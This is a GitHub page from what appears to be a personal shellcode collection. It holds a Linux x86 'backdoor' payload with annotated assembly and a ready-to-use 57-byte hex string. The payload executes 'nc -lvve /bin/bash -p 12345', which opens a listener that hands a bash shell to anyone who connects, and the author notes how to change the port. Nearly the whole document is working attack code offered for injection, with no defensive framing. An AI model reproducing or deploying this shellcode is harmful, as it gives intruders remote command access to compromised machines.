Shellcode/x86_backdoor at master · xophidia/Shellcode · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
---------------------------------
Open a listener on 12345 with nc
---------------------------------

By Xophidia - 2016
Platform: Linux / x86


Commande : nc -lvve /bin/bash -p 12345
- many tries to split arg
- can't put 0x32 between -p and 1

xor    eax,eax
push   0x35343332  ; -p 12345 Change those bytes for another port
push   0x3170762d  ;
mov    edx,esp
push   eax
push   0x68732f6e
push   0x69622f65
push   0x76766c2d
mov    ecx,esp
push   eax
push   0x636e2f2f
push   0x6e69622f
mov    ebx,esp
push   eax
push   edx         ; @ of port
push   ecx		   ; @ of argv[]
push   ebx		   ; @ of /bin/nc
xor    edx,edx	   ; edx = envp[]
mov    ecx,esp
mov    al,0xb	   ; execve
int    0x80


Length : 57

"\x31\xc0\x68\x32\x33\x34\x35\x68\x2d\x76\x70\x31\x89\xe2\x50\x68\x6e\x2f\x73\x68\x68\x65"
"\x2f\x62\x69\x68\x2d\x6c\x76\x76\x89\xe1\x50\x68\x2f\x2f\x6e\x63\x68\x2f\x62\x69\x6e\x89"
"\xe3\x50\x52\x51\x53\x31\xd2\x89\xe1\xb0\x0b\xcd\x80"